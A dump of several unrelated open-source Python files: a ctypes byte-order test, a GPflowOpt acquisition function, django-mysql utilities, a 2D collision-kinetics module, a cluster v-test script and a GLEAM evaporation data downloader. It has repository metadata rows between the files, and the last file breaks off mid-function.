self.assertEqual(bin(struct.pack("<q", 0x1234567890ABCDEF)), "EFCDAB9078563412")
self.assertEqual(bin(s), "EFCDAB9078563412")
self.assertEqual(s.value, 0x1234567890ABCDEF)
s = c_ulonglong.__ctype_be__(0x1234567890ABCDEF)
self.assertEqual(bin(struct.pack(">Q", 0x1234567890ABCDEF)), "1234567890ABCDEF")
self.assertEqual(bin(s), "1234567890ABCDEF")
self.assertEqual(s.value, 0x1234567890ABCDEF)
s = c_ulonglong.__ctype_le__(0x1234567890ABCDEF)
self.assertEqual(bin(struct.pack("<Q", 0x1234567890ABCDEF)), "EFCDAB9078563412")
self.assertEqual(bin(s), "EFCDAB9078563412")
self.assertEqual(s.value, 0x1234567890ABCDEF)
def test_endian_float(self):
if sys.byteorder == "little":
self.assertIs(c_float.__ctype_le__, c_float)
self.assertIs(c_float.__ctype_be__.__ctype_le__, c_float)
else:
self.assertIs(c_float.__ctype_be__, c_float)
self.assertIs(c_float.__ctype_le__.__ctype_be__, c_float)
s = c_float(math.pi)
self.assertEqual(bin(struct.pack("f", math.pi)), bin(s))
# Hm, what's the precision of a float compared to a double?
self.assertAlmostEqual(s.value, math.pi, 6)
s = c_float.__ctype_le__(math.pi)
self.assertAlmostEqual(s.value, math.pi, 6)
self.assertEqual(bin(struct.pack("<f", math.pi)), bin(s))
s = c_float.__ctype_be__(math.pi)
self.assertAlmostEqual(s.value, math.pi, 6)
self.assertEqual(bin(struct.pack(">f", math.pi)), bin(s))
def test_endian_double(self):
if sys.byteorder == "little":
self.assertIs(c_double.__ctype_le__, c_double)
self.assertIs(c_double.__ctype_be__.__ctype_le__, c_double)
else:
self.assertIs(c_double.__ctype_be__, c_double)
self.assertIs(c_double.__ctype_le__.__ctype_be__, c_double)
s = c_double(math.pi)
self.assertEqual(s.value, math.pi)
self.assertEqual(bin(struct.pack("d", math.pi)), bin(s))
s = c_double.__ctype_le__(math.pi)
self.assertEqual(s.value, math.pi)
self.assertEqual(bin(struct.pack("<d", math.pi)), bin(s))
s = c_double.__ctype_be__(math.pi)
self.assertEqual(s.value, math.pi)
self.assertEqual(bin(struct.pack(">d", math.pi)), bin(s))
def test_endian_other(self):
self.assertIs(c_byte.__ctype_le__, c_byte)
self.assertIs(c_byte.__ctype_be__, c_byte)
self.assertIs(c_ubyte.__ctype_le__, c_ubyte)
self.assertIs(c_ubyte.__ctype_be__, c_ubyte)
self.assertIs(c_char.__ctype_le__, c_char)
self.assertIs(c_char.__ctype_be__, c_char)
def test_struct_fields_1(self):
if sys.byteorder == "little":
base = BigEndianStructure
else:
base = LittleEndianStructure
class T(base):
pass
_fields_ = [("a", c_ubyte),
("b", c_byte),
("c", c_short),
("d", c_ushort),
("e", c_int),
("f", c_uint),
("g", c_long),
("h", c_ulong),
("i", c_longlong),
("k", c_ulonglong),
("l", c_float),
("m", c_double),
("n", c_char),
("b1", c_byte, 3),
("b2", c_byte, 3),
("b3", c_byte, 2),
("a", c_int * 3 * 3 * 3)]
T._fields_ = _fields_
# these fields do not support different byte order:
for typ in c_wchar, c_void_p, POINTER(c_int):
_fields_.append(("x", typ))
class T(base):
pass
self.assertRaises(TypeError, setattr, T, "_fields_", [("x", typ)])
def test_struct_struct(self):
# nested structures with different byteorders
# create nested structures with given byteorders and set memory to data
for nested, data in (
(BigEndianStructure, b'\0\0\0\1\0\0\0\2'),
(LittleEndianStructure, b'\1\0\0\0\2\0\0\0'),
):
for parent in (
BigEndianStructure,
LittleEndianStructure,
Structure,
):
class NestedStructure(nested):
_fields_ = [("x", c_uint32),
("y", c_uint32)]
class TestStructure(parent):
_fields_ = [("point", NestedStructure)]
self.assertEqual(len(data), sizeof(TestStructure))
ptr = POINTER(TestStructure)
s = cast(data, ptr)[0]
del ctypes._pointer_type_cache[TestStructure]
self.assertEqual(s.point.x, 1)
self.assertEqual(s.point.y, 2)
def test_struct_fields_2(self):
# standard packing in struct uses no alignment.
# So, we have to align using pad bytes.
#
# Unaligned accesses will crash Python (on those platforms that
# don't allow it, like sparc solaris).
if sys.byteorder == "little":
base = BigEndianStructure
fmt = ">bxhid"
else:
base = LittleEndianStructure
fmt = "<bxhid"
class S(base):
_fields_ = [("b", c_byte),
("h", c_short),
("i", c_int),
("d", c_double)]
s1 = S(0x12, 0x1234, 0x12345678, 3.14)
s2 = struct.pack(fmt, 0x12, 0x1234, 0x12345678, 3.14)
self.assertEqual(bin(s1), bin(s2))
def test_unaligned_nonnative_struct_fields(self):
if sys.byteorder == "little":
base = BigEndianStructure
fmt = ">b h xi xd"
else:
base = LittleEndianStructure
fmt = "<b h xi xd"
class S(base):
_pack_ = 1
_fields_ = [("b", c_byte),
("h", c_short),
("_1", c_byte),
("i", c_int),
("_2", c_byte),
("d", c_double)]
s1 = S()
s1.b = 0x12
s1.h = 0x1234
s1.i = 0x12345678
s1.d = 3.14
s2 = struct.pack(fmt, 0x12, 0x1234, 0x12345678, 3.14)
self.assertEqual(bin(s1), bin(s2))
def test_unaligned_native_struct_fields(self):
if sys.byteorder == "little":
fmt = "<b h xi xd"
else:
base = LittleEndianStructure
fmt = ">b h xi xd"
class S(Structure):
_pack_ = 1
_fields_ = [("b", c_byte),
("h", c_short),
("_1", c_byte),
("i", c_int),
("_2", c_byte),
("d", c_double)]
s1 = S()
s1.b = 0x12
s1.h = 0x1234
s1.i = 0x12345678
s1.d = 3.14
s2 = struct.pack(fmt, 0x12, 0x1234, 0x12345678, 3.14)
self.assertEqual(bin(s1), bin(s2))
if __name__ == "__main__":
unittest.main()
| apache-2.0 | 3,056,722,733,219,436,000 | 35.694915 | 88 | 0.511331 | false |
GPflow/GPflowOpt | gpflowopt/acquisition/pof.py | 1 | 3594 | # Copyright 2017 Joachim van der Herten
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .acquisition import Acquisition
from gpflow import settings
import numpy as np
import tensorflow as tf
float_type = settings.dtypes.float_type
stability = settings.numerics.jitter_level
class ProbabilityOfFeasibility(Acquisition):
"""
Probability of Feasibility acquisition function for sampling feasible regions. Standard acquisition function for
Bayesian Optimization with black-box expensive constraints.
Key reference:
::
@article{Schonlau:1997,
title={Computer experiments and global optimization},
author={Schonlau, Matthias},
year={1997},
publisher={University of Waterloo}
}
The acquisition function measures the probability of the latent function
being smaller than a threshold for a candidate point.
.. math::
\\alpha(\\mathbf x_{\\star}) = \\int_{-\\infty}^{0} \\, p(f_{\\star}\\,|\\, \\mathbf x, \\mathbf y, \\mathbf x_{\\star} ) \\, d f_{\\star}
"""
def __init__(self, model, threshold=0.0, minimum_pof=0.5):
"""
:param model: GPflow model (single output) representing our belief of the constraint
:param threshold: Observed values lower than the threshold are considered valid
:param minimum_pof: minimum pof score required for a point to be valid.
For more information, see docstring of feasible_data_index
"""
super(ProbabilityOfFeasibility, self).__init__(model)
self.threshold = threshold
self.minimum_pof = minimum_pof
def constraint_indices(self):
return np.arange(self.data[1].shape[1])
def feasible_data_index(self):
"""
Returns a boolean array indicating which points are feasible (True) and which are not (False).
Answering the question *which points are feasible?* is slightly troublesome in case noise is present.
Directly relying on the noisy data and comparing it to self.threshold does not make much sense.
Instead, we rely on the model belief using the PoF (a probability between 0 and 1).
As the implementation of the PoF corresponds to the cdf of the (normal) predictive distribution in
a point evaluated at the threshold, requiring a minimum pof of 0.5 implies the mean of the predictive
distribution is below the threshold, hence it is marked as feasible. A minimum pof of 0 marks all points valid.
Setting it to 1 results in all invalid.
:return: boolean ndarray (size N)
"""
pred = self.evaluate(self.data[0])
return pred.ravel() > self.minimum_pof
def build_acquisition(self, Xcand):
candidate_mean, candidate_var = self.models[0].build_predict(Xcand)
candidate_var = tf.maximum(candidate_var, stability)
normal = tf.contrib.distributions.Normal(candidate_mean, tf.sqrt(candidate_var))
return normal.cdf(tf.constant(self.threshold, dtype=float_type), name=self.__class__.__name__)
| apache-2.0 | -1,453,852,975,451,257,900 | 41.282353 | 145 | 0.687257 | false |
adamchainz/django-mysql | src/django_mysql/utils.py | 1 | 9970 | import os
import subprocess
import time
from collections import defaultdict
from queue import Empty, Queue
from threading import Lock, Thread
from weakref import WeakKeyDictionary
import django
from django.db import DEFAULT_DB_ALIAS
from django.db import connection as default_connection
from django.db import connections
class WeightedAverageRate:
"""
Adapted from percona-toolkit - provides a weighted average counter to keep
at a certain rate of activity (row iterations etc.).
"""
def __init__(self, target_t, weight=0.75):
"""
target_t - Target time for t in update()
weight - Weight of previous n/t values
"""
self.target_t = target_t
self.avg_n = 0.0
self.avg_t = 0.0
self.weight = weight
def update(self, n, t):
"""
Update weighted average rate. Param n is generic; it's how many of
whatever the caller is doing (rows, checksums, etc.). Param s is how
long this n took, in seconds (hi-res or not).
Parameters:
n - Number of operations (rows, etc.)
t - Amount of time in seconds that n took
Returns:
n adjusted to meet target_t based on weighted decaying avg rate
"""
if self.avg_n and self.avg_t:
self.avg_n = (self.avg_n * self.weight) + n
self.avg_t = (self.avg_t * self.weight) + t
else:
self.avg_n = n
self.avg_t = t
return int(self.avg_rate * self.target_t)
@property
def avg_rate(self):
try:
return self.avg_n / self.avg_t
except ZeroDivisionError:
# Assume a small amount of time, not 0
return self.avg_n / 0.001
class StopWatch:
"""
Context manager for timing a block
"""
def __enter__(self):
self.start_time = time.time()
return self
def __exit__(self, *args, **kwargs):
self.end_time = time.time()
self.total_time = self.end_time - self.start_time
def format_duration(total_seconds):
hours = total_seconds // 3600
minutes = (total_seconds % 3600) // 60
seconds = total_seconds % 60
out = []
if hours > 0:
out.extend([str(hours), "h"])
if hours or minutes:
out.extend([str(minutes), "m"])
out.extend([str(seconds), "s"])
return "".join(out)
if django.VERSION >= (3, 0):
def connection_is_mariadb(connection):
return connection.vendor == "mysql" and connection.mysql_is_mariadb
else:
_is_mariadb_cache = WeakKeyDictionary()
def connection_is_mariadb(connection):
if connection.vendor != "mysql":
return False
if connection is default_connection:
connection = connections[DEFAULT_DB_ALIAS]
try:
return _is_mariadb_cache[connection]
except KeyError:
with connection.temporary_connection():
server_info = connection.connection.get_server_info()
is_mariadb = "MariaDB" in server_info
_is_mariadb_cache[connection] = is_mariadb
return is_mariadb
def settings_to_cmd_args(settings_dict):
"""
Copied from django 1.8 MySQL backend DatabaseClient - where the runshell
commandline creation has been extracted and made callable like so.
"""
args = ["mysql"]
db = settings_dict["OPTIONS"].get("db", settings_dict["NAME"])
user = settings_dict["OPTIONS"].get("user", settings_dict["USER"])
passwd = settings_dict["OPTIONS"].get("passwd", settings_dict["PASSWORD"])
host = settings_dict["OPTIONS"].get("host", settings_dict["HOST"])
port = settings_dict["OPTIONS"].get("port", settings_dict["PORT"])
cert = settings_dict["OPTIONS"].get("ssl", {}).get("ca")
defaults_file = settings_dict["OPTIONS"].get("read_default_file")
# Seems to be no good way to set sql_mode with CLI.
if defaults_file:
args += ["--defaults-file=%s" % defaults_file]
if user:
args += ["--user=%s" % user]
if passwd:
args += ["--password=%s" % passwd]
if host:
if "/" in host:
args += ["--socket=%s" % host]
else:
args += ["--host=%s" % host]
if port:
args += ["--port=%s" % port]
if cert:
args += ["--ssl-ca=%s" % cert]
if db:
args += [db]
return args
programs_memo = {}
def have_program(program_name):
global programs_memo
if program_name not in programs_memo:
status = subprocess.call(["which", program_name], stdout=subprocess.PIPE)
programs_memo[program_name] = status == 0
return programs_memo[program_name]
def pt_fingerprint(query):
"""
Takes a query (in a string) and returns its 'fingerprint'
"""
if not have_program("pt-fingerprint"): # pragma: no cover
raise OSError("pt-fingerprint doesn't appear to be installed")
thread = PTFingerprintThread.get_thread()
thread.in_queue.put(query)
return thread.out_queue.get()
class PTFingerprintThread(Thread):
"""
Class for a singleton background thread to pass queries to pt-fingerprint
and get their fingerprints back. This is done because the process launch
time is relatively expensive and it's useful to be able to fingerprinting
queries quickly.
The get_thread() class method returns the singleton thread - either
instantiating it or returning the existing one.
The thread launches pt-fingerprint with subprocess and then takes queries
from an input queue, passes them the subprocess and returns the fingerprint
to an output queue. If it receives no queries in PROCESS_LIFETIME seconds,
it closes the subprocess and itself - so you don't have processes hanging
around.
"""
the_thread = None
life_lock = Lock()
PROCESS_LIFETIME = 60.0 # seconds
@classmethod
def get_thread(cls):
with cls.life_lock:
if cls.the_thread is None:
in_queue = Queue()
out_queue = Queue()
thread = cls(in_queue, out_queue)
thread.daemon = True
thread.in_queue = in_queue
thread.out_queue = out_queue
thread.start()
cls.the_thread = thread
return cls.the_thread
def __init__(self, in_queue, out_queue, **kwargs):
self.in_queue = in_queue
self.out_queue = out_queue
super().__init__(**kwargs)
def run(self):
# pty is unix/linux only
import pty # noqa
global fingerprint_thread
master, slave = pty.openpty()
proc = subprocess.Popen(
["pt-fingerprint"], stdin=subprocess.PIPE, stdout=slave, close_fds=True
)
stdin = proc.stdin
stdout = os.fdopen(master)
while True:
try:
query = self.in_queue.get(timeout=self.PROCESS_LIFETIME)
except Empty:
self.life_lock.acquire()
# We timed out, but there was something put into the queue
# since
if (
self.__class__.the_thread is self and self.in_queue.qsize()
): # pragma: no cover
self.life_lock.release()
break
# Die
break
stdin.write(query.encode("utf-8"))
if not query.endswith(";"):
stdin.write(b";")
stdin.write(b"\n")
stdin.flush()
fingerprint = stdout.readline()
self.out_queue.put(fingerprint.strip())
stdin.close()
self.__class__.the_thread = None
self.life_lock.release()
def collapse_spaces(string):
bits = string.replace("\n", " ").split(" ")
return " ".join(filter(None, bits))
def index_name(model, *field_names, **kwargs):
"""
Returns the name of the index existing on field_names, or raises KeyError
if no such index exists.
"""
if not len(field_names):
raise ValueError("At least one field name required")
using = kwargs.pop("using", DEFAULT_DB_ALIAS)
if len(kwargs):
raise ValueError("The only supported keyword argument is 'using'")
existing_fields = {field.name: field for field in model._meta.fields}
fields = [existing_fields[name] for name in field_names if name in existing_fields]
if len(fields) != len(field_names):
unfound_names = set(field_names) - {field.name for field in fields}
raise ValueError("Fields do not exist: " + ",".join(unfound_names))
column_names = tuple(field.column for field in fields)
list_sql = get_list_sql(column_names)
with connections[using].cursor() as cursor:
cursor.execute(
"""SELECT `INDEX_NAME`, `SEQ_IN_INDEX`, `COLUMN_NAME`
FROM INFORMATION_SCHEMA.STATISTICS
WHERE TABLE_SCHEMA = DATABASE() AND
TABLE_NAME = %s AND
COLUMN_NAME IN {list_sql}
ORDER BY `INDEX_NAME`, `SEQ_IN_INDEX` ASC
""".format(
list_sql=list_sql
),
(model._meta.db_table,) + column_names,
)
indexes = defaultdict(list)
for index_name, _, column_name in cursor.fetchall():
indexes[index_name].append(column_name)
indexes_by_columns = {tuple(v): k for k, v in indexes.items()}
try:
return indexes_by_columns[column_names]
except KeyError:
raise KeyError("There is no index on (" + ",".join(field_names) + ")")
def get_list_sql(sequence):
return "({})".format(",".join("%s" for x in sequence))
def mysql_connections():
conn_names = [DEFAULT_DB_ALIAS] + list(set(connections) - {DEFAULT_DB_ALIAS})
for alias in conn_names:
connection = connections[alias]
if connection.vendor == "mysql":
yield alias, connection
| bsd-3-clause | -5,315,907,786,015,990,000 | 30.550633 | 87 | 0.590672 | false |
th0mmeke/toyworld | kinetics_2D.py | 1 | 7872 | """
Created on 22/03/2013
@author: thom
"""
import random
import math
import logging
from rdkit.Chem import AllChem as Chem
from ULPS import Float_t
import config
class Kinetics2D(object):
@classmethod
def get_ke(cls, m, x, y):
return 0.5 * m * (x * x + y * y)
@classmethod
def get_speed(cls, x, y):
return math.sqrt(x * x + y * y)
@classmethod
def radial_to_xyz(cls, theta=None, r=None):
"""Always returns a 2-D x,y"""
if theta is None:
theta = random.uniform(0, 2.0 * math.pi)
if r is None:
r = random.uniform(0, 1)
y = math.sin(theta) * r
x = math.cos(theta) * r
return x, y
@classmethod
def xyz_to_radial(cls, x, y):
"""Always returns a 2-D theta,r"""
r = math.hypot(x, y)
theta = math.atan2(y, x)
return theta, r
@classmethod
def get_distance(cls, l1, l2):
return math.sqrt(sum([(_l1 - _l2) * (_l1 - _l2) for _l1, _l2 in zip(l1, l2)]))
@classmethod
def get_CM_energy(cls, mols):
"""Return KE of Centre of Mass: _ke = 1/2mv^2, where mv for the centre of mass = sum (mi * vi) for all particles i
:param mols: list of Molecule"""
total_mass = sum([mol.get_mass() for mol in mols])
return cls.get_ke(total_mass, *cls.get_CM_velocity(mols))
@classmethod
def get_CM_velocity(cls, mols):
"""Return the momentum (mdx,mdy) of the centre of mass for these particles"""
cm_momentum = [0, 0]
total_mass = sum([mol.get_mass() for mol in mols])
for mol in mols:
cm_momentum += mol.get_velocity() * mol.get_mass()
CM_velocity = cm_momentum / total_mass
logging.debug("CM velocity = {}".format(CM_velocity))
return CM_velocity
# for mol in mols:
# cm_momentum[0] += mol.get_mass() * mol.get_velocity()[0]
# cm_momentum[1] += mol.get_mass() * mol.get_velocity()[1]
# return [mv / total_mass for mv in cm_momentum]
@classmethod
def inelastic_collision(cls, reactant_mols, product_mols, energy_delta):
"""Determine velocities of product molecules following a collision of reactant molecules, for between one and three product molecules.
Model as a collision, followed by an explosion, meaning that the total momentum of the system is conserved - if two particles, each has equal and opposite momentum in CoM frame
Assume an impulse, or force, splitting the particles apart, acting equally on each particle
Then impulse J = mv2-mv1 and so momentum change will be the same for all particles
Implies that for two particles, equal and opposite mv in CoM frame, and for three particles, mv arranged in equilateral triangle
Post-conditions:
1. Sum in_mass = Sum out_mass - although #in_molecules ne #out_molecules
2. Vector speed and direction of CoM remains constant
3. in_KE + in_PE + in_IE = Sum out_KE + out_PE + out_IE or in_KE - delta_KE = out_KE
:param reactant_mols: reactants - must have total KE > 0
:type reactant_mols: list of Molecule
:param product_mols: products of reaction - must be 1, 2 or 3 products only
:type product_mols: list of Molecule
:param energy_delta: final KE = initial KE - energy_delta
"""
def total_mv(mv):
totals = [0, 0]
for mv_ in mv:
for dim in range(len(totals)):
totals[dim] += mv_[dim]
return totals
if len(product_mols) < 1 or len(product_mols) > 3:
raise ValueError()
logging.debug("reactant_mols = {}, product_mols = {}".format([Chem.MolToSmiles(mol) for mol in reactant_mols], [Chem.MolToSmiles(mol) for mol in product_mols]))
in_v = [mol.get_velocity() for mol in reactant_mols]
in_mass = [mol.get_mass() for mol in reactant_mols]
in_mv = [[m * v_ for v_ in v] for m, v in zip(in_mass, in_v)]
in_ke = sum([mol.get_kinetic_energy() for mol in reactant_mols])
in_ie = sum([mol.get_internal_energy() for mol in reactant_mols])
# Velocity of centre of mass after collision
# Momentums add to zero in the CoM frame
out_mass = [mol.get_mass() for mol in product_mols]
cm_in_v = cls.get_CM_velocity(reactant_mols)
cm_in_radial_v = cls.xyz_to_radial(*cm_in_v)
# Bound energy_of_collision to above zero (rounding errors for small values)
# consistent sense with that in discover_reaction - final_PE = initial_PE + energy_delta => final_KE = initial_KE - energy_delta
energy_of_collision = max(0, in_ke + in_ie - energy_delta - cls.get_CM_energy(reactant_mols))
if energy_of_collision <= 0:
raise ValueError
out_v_in_CoM_frame = []
if len(out_mass) == 1:
# One out particle is stationary in out_CoM frame
IE = energy_of_collision # inelastic collision -> loss of KE -> must go to IE
out_v_in_CoM_frame.append([0, 0])
elif len(out_mass) == 2:
ke_in_CM_frame = random.uniform(0, energy_of_collision)
IE = energy_of_collision - ke_in_CM_frame
mv = math.sqrt((2.0 * ke_in_CM_frame * out_mass[0] * out_mass[1]) / (out_mass[0] + out_mass[1]))
out_v_in_CoM_frame.append(cls.radial_to_xyz(cm_in_radial_v[0] + math.pi * 0.5, mv))
out_v_in_CoM_frame.append(cls.radial_to_xyz(cm_in_radial_v[0] + math.pi * 1.5, mv))
elif len(out_mass) == 3:
# Sum of vector momentums = 0, and in centre of momentum frame arranged as equilateral triangle, side mv
# Must then convert to velocities by dividing by particle mass, which means no longer equilateral...but unimportant, as only needed equilateral to initially arrange
ke_in_CM_frame = random.uniform(0, energy_of_collision) # The energy of the collision - over and above the energy of the centre of mass, which is invariant
IE = energy_of_collision - ke_in_CM_frame
mv = math.sqrt((2.0 * ke_in_CM_frame * out_mass[0] * out_mass[1] * out_mass[2]) / (out_mass[0] * out_mass[1] + out_mass[1] * out_mass[2] + out_mass[0] * out_mass[2]))
out_v_in_CoM_frame.append(cls.radial_to_xyz(cm_in_radial_v[0] + math.pi / 3.0, mv))
out_v_in_CoM_frame.append(cls.radial_to_xyz(cm_in_radial_v[0] - math.pi / 3.0, mv))
out_v_in_CoM_frame.append(cls.radial_to_xyz(cm_in_radial_v[0] + math.pi, mv))
# Now convert from momentums to velocities by scaling by 1/mass
out_v_in_CoM_frame = [[mv_component / mass for mv_component in particle_mv] for particle_mv, mass in zip(out_v_in_CoM_frame, out_mass)]
# Finally convert back from CoM frame to lab frame
out_v = [[v_ + cm_v_ for v_, cm_v_ in zip(v, cm_in_v)] for v in out_v_in_CoM_frame]
#########################
# Confirm post-conditions
# 1. Mass
assert Float_t.almost_equal(sum(in_mass), sum(out_mass))
# 2. Momentum
out_mv = [[m * v_ for v_ in v] for m, v in zip(out_mass, out_v)]
in_mv_total = total_mv(in_mv)
out_mv_total = total_mv(out_mv)
logging.debug("IN MV = {}, OUT MV = {}".format(in_mv_total, out_mv_total))
for in_, out_ in zip(in_mv_total, out_mv_total):
assert Float_t.almost_equal(in_, out_)
# 3. Energy
out_ke = sum([cls.get_ke(m, *v) for m, v in zip(out_mass, out_v)])
logging.debug("IN_KE + IN_IE = {}+{} = {}, OUT_KE + DELTA + IE = {} + {} + {} = {}".format(in_ke, in_ie, in_ke + in_ie, out_ke, energy_delta, IE, out_ke + energy_delta + IE))
assert Float_t.almost_equal(in_ke + in_ie, out_ke + energy_delta + IE, max_diff=config.EnergyTolerance)
return out_v, IE
| gpl-3.0 | 6,768,914,614,100,645,000 | 43.982857 | 184 | 0.597053 | false |
Diviyan-Kalainathan/causal-humans | ClusterAnalysis/v_test.py | 1 | 2510 | '''
Analyses the clusters and returns v-type of vars
Author : Diviyan Kalainathan
Date : 28/06/2016
DEPRECATED - Use plot-gen/Cluster_extraction instead
'''
import csv,numpy
def v_test(input_data,data_folder,num_clusters, num_vars, list_vars):
"""
:param input_data: Data used to do the clustering(String)
:param data_folder: Folder where the clustering output is(String)
:param num_clusters: Number of clusters(int)
:param num_vars:Number of variables to analyse(int)
:param list_vars:List of these vars(list[String])
:return: 0
"""
totaldata = numpy.zeros((num_vars, 2)) #0 for mean , #1 for
for n in range(num_vars):
col_data=[]
with open('input/' + input_data, 'rb') as totalfile:
datareader = csv.reader(totalfile, delimiter=';', quotechar='|')
header = next(datareader)
for row in datareader:
col_data+=[row[n]]
totaldata[n,0]=numpy.mean(col_data)
totaldata[n,1]=numpy.std(col_data)
cluster_size=numpy.zeros((num_clusters))
for i in range(num_clusters):
file = open('output/'+ data_folder +'/cluster_'+str(i)+'.csv')
cluster_size[i] = len(file.readlines())-2
total_size=numpy.sum(cluster_size)
for num_file in range(num_clusters):
with open('output/' + data_folder + '/cluster_similarity_' + str(int(num_file)) + '.csv', 'wb') as outputfile:
datawriter = csv.writer(outputfile, delimiter=';', quotechar='|')
datawriter.writerow(['Var name','V-type'])
for n_var in range(num_vars):
with open('output/'+ data_folder +'/cluster_'+str(num_file)+'.csv', 'rb') as datafile:
datareader = csv.reader(datafile, delimiter=';', quotechar='|')
header = next(datareader)
name_value=[]
for row in datareader:
name_value+=[row[n_var]]
result=[list_vars[n_var],((numpy.mean(name_value)-totaldata[n_var,0])/ numpy.sqrt(((total_size-cluster_size[num_file])/(total_size-1))*((totaldata[n_var,1]**2)/cluster_size[num_file])))]
# ! Calcul v-type
with open('output/' + data_folder + '/cluster_similarity_' + str(int(num_file)) + '.csv', 'a') as outputfile:
datawriter = csv.writer(outputfile, delimiter=';', quotechar='|',
lineterminator='\n')
datawriter.writerow(result)
return 0 | mit | 1,592,596,920,828,584,400 | 42.293103 | 202 | 0.584064 | false |
wateraccounting/wa | Collect/GLEAM/DataAccess.py | 1 | 8456 | # -*- coding: utf-8 -*-
# -*- coding: utf-8 -*-
"""
Authors: Tim Hessels
UNESCO-IHE 2016
Contact: [email protected]
Repository: https://github.com/wateraccounting/wa
Module: Collect/GLEAM
"""
# import general python modules
import os
import numpy as np
import pandas as pd
import glob
from joblib import Parallel, delayed
import paramiko
import calendar
from netCDF4 import Dataset
# Water Accounting modules
import wa.General.data_conversions as DC
from wa import WebAccounts
def DownloadData(Dir, Startdate, Enddate, latlim, lonlim, Waitbar, cores, TimeCase):
"""
This function downloads GLEAM ET data
Keyword arguments:
Dir -- 'C:/file/to/path/'
Startdate -- 'yyyy-mm-dd'
Enddate -- 'yyyy-mm-dd'
latlim -- [ymin, ymax] (values must be between -50 and 50)
lonlim -- [xmin, xmax] (values must be between -180 and 180)
cores -- The number of cores used to run the routine. It can be 'False'
to avoid using parallel computing routines.
Waitbar -- 1 (Default) will print a waitbar
"""
# Check start and end date and otherwise set the date
if not Startdate:
Startdate = pd.Timestamp('2003-01-01')
if not Enddate:
Enddate = pd.Timestamp('2015-12-31')
# Make an array of the days of which the ET is taken
YearsDownloadstart = str(Startdate[0:4])
YearsDownloadend = str(Enddate[0:4])
Years = range(int(YearsDownloadstart),int(YearsDownloadend)+1)
# String Parameters
if TimeCase == 'daily':
VarCode = 'ET_GLEAM.V3.1b_mm-day-1_daily'
FTPprefix = 'data/v3.1b/'
TimeFreq = 'D'
Folder_name = 'Daily'
elif TimeCase == 'monthly':
VarCode = 'ET_GLEAM.V3.1b_mm-month-1_monthly'
FTPprefix = 'data/v3.1b/'
TimeFreq = 'M'
Folder_name = 'Monthly'
# Get end of month for Enddate
monthDownloadend = str(Enddate[5:7])
End_month = calendar.monthrange(int(YearsDownloadend),int(monthDownloadend))[1]
Enddate = '%d-%02d-%d' %(int(YearsDownloadend),int(monthDownloadend),int(End_month))
else:
raise KeyError("The input time interval is not supported")
Dates = pd.date_range(Startdate, Enddate, freq = TimeFreq)
# Make directory for the MODIS ET data
output_folder=os.path.join(Dir,'Evaporation', 'GLEAM', Folder_name)
if not os.path.exists(output_folder):
os.makedirs(output_folder)
# Check variables
if latlim[0] < -50 or latlim[1] > 50:
print ('Latitude above 50N or below 50S is not possible.'
' Value set to maximum')
latlim[0] = np.max(latlim[0], -50)
latlim[1] = np.min(lonlim[1], 50)
if lonlim[0] < -180 or lonlim[1] > 180:
print ('Longitude must be between 180E and 180W.'
' Now value is set to maximum')
lonlim[0] = np.max(latlim[0], -180)
lonlim[1] = np.min(lonlim[1], 180)
# Collect the data from the GLEAM webpage and returns the data and lat and long in meters of those tiles
try:
Collect_data(FTPprefix, Years, output_folder, Waitbar)
except:
print "Was not able to download the file"
# Create Waitbar
print '\nProcess the GLEAM data'
if Waitbar == 1:
import wa.Functions.Start.WaitbarConsole as WaitbarConsole
total_amount = len(Dates)
amount = 0
WaitbarConsole.printWaitBar(amount, total_amount, prefix = 'Progress:', suffix = 'Complete', length = 50)
# Pass variables to parallel function and run
args = [output_folder, latlim, lonlim, VarCode, TimeCase]
if not cores:
for Date in Dates:
RetrieveData(Date, args)
if Waitbar == 1:
amount += 1
WaitbarConsole.printWaitBar(amount, total_amount, prefix = 'Progress:', suffix = 'Complete', length = 50)
results = True
else:
results = Parallel(n_jobs=cores)(delayed(RetrieveData)(Date, args)
for Date in Dates)
# Remove all .hdf files
os.chdir(output_folder)
files = glob.glob("*.nc")
for f in files:
os.remove(os.path.join(output_folder, f))
return(results)
def RetrieveData(Date, args):
"""
This function retrieves GLEAM ET data for a given date from the
www.gleam.eu server.
Keyword arguments:
Date -- 'yyyy-mm-dd'
args -- A list of parameters defined in the DownloadData function.
"""
# Argument
[output_folder, latlim, lonlim, VarCode, TimeCase] = args
# Adjust latlim to GLEAM dataset
latlim1=[latlim[1]*-1, latlim[0]*-1]
# select the spatial dataset
Ystart=int(np.floor((latlim1[0]+90)/0.25))
Yend=int(np.ceil((latlim1[1]+90)/0.25))
Xstart=int(np.floor((lonlim[0]+180)/0.25))
Xend=int(np.ceil((lonlim[1]+180)/0.25))
Year=Date.year
Month=Date.month
filename='E_' + str(Year) + '_GLEAM_v3.1b.nc'
local_filename = os.path.join(output_folder, filename)
f = Dataset(local_filename,mode='r')
if TimeCase == 'monthly':
# defines the start and end of the month
Datesend1=str(Date)
Datesend2=Datesend1.replace(Datesend1[8:10],"01")
Datesend3=Datesend2[0:10]
Datesend4=Datesend1[0:10]
Datestart = pd.date_range(Datesend3,Datesend4,freq = 'MS')
# determine the DOY-1 and DOYend (those are use to define the temporal boundaries of the yearly data)
DOY=int(Datestart[0].strftime('%j'))
DOYend=int(Date.strftime('%j'))
DOYDownload=DOY-1
Day = 1
Data = f.variables['E'][DOYDownload:DOYend,Xstart:Xend,Ystart:Yend]
data=np.array(Data)
f.close()
# Sum ET data in time and change the no data value into -999
dataSum=sum(data,1)
dataSum[dataSum<-100]=-999.000
dataCor=np.swapaxes(dataSum,0,1)
if TimeCase == 'daily':
Day = Date.day
# Define the DOY, DOY-1 is taken from the yearly dataset
DOY=int(Date.strftime('%j'))
DOYDownload=DOY-1
Data = f.variables['E'][DOYDownload,Xstart:Xend,Ystart:Yend]
data=np.array(Data)
f.close()
data[data<-100]=-999.000
dataCor=np.swapaxes(data,0,1)
# The Georeference of the map
geo_in=[lonlim[0], 0.25, 0.0, latlim[1], 0.0, -0.25]
# Name of the map
dataset_name=VarCode + '_' + str(Year) + '.' + str(Month).zfill(2) + '.' + str(Day).zfill(2) + '.tif'
output_file=os.path.join(output_folder, dataset_name)
# save data as tiff file
